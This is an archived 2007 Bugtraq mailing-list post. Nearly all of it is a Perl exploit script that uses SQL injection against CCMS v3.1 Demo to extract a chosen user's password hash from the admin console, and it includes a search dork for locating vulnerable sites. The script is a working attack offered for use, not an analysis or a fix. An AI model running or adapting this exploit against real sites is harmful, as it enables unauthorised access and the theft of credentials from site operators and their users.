lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20071229201607.16238.qmail@securityfocus.com>
Date: 29 Dec 2007 20:16:07 -0000
From: pawel2827@...il.com
To: bugtraq@...urityfocus.com
Subject: CCMS v3.1 Demo <= SQL Injection Vulnerability 0day

#!/usr/bin/perl 
#Found by Pr0metheuS 
#Coded by Pr0metheuS 
#Gr33tz-Team 
#Dork : intitle:"CCMS v3.1 Demo PW" 
print "______________________________________\n"; 
print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; 
print "______________________________________\n"; 
print "[+] Enter SITE:\n"; 
$SITE = <STDIN>; 
chomp $SITE; 
print "[+] Enter PATH:\n"; 
$PATH = <STDIN>; 
chomp $PATH; 
print "[+] Enter USERID:\n"; 
$USERID = <STDIN>; 
chomp $USERID; 
print "______________________________________\n"; 
#Send Request 
use LWP::UserAgent; 
$ua = new LWP::UserAgent; 
$ua->agent("Mozilla/8.0"); 
$ua = LWP::UserAgent->new; 
my $req = HTTP::Request->new(GET => "$SITE$PATH/admin.php/vars.php?page=Console&p=1'+union+select+userid,2,3,PASSWORD+from+user+where+userid=$USERID/*"); 
$req->header('Accept' => 'text/html'); 
$res = $ua->request($req); 
$con = $res->content; 
#FIND MD5 IN TEXT REGEX !!! 
if ($con =~ "/([0-9a-fA-F]{32})/") { 
print "______________________________________\n"; 
print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; 
print "[+] Exploit successful!\n"; 
print "[+] USERID:$USERID\n"; 
print "[+] MD5:$1\n"; 
print "______________________________________\n"; 
} 
else{ 
print "______________________________________\n"; 
print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; 
print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; 
    print "[+] Exploit Failed!\n"; 
}

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ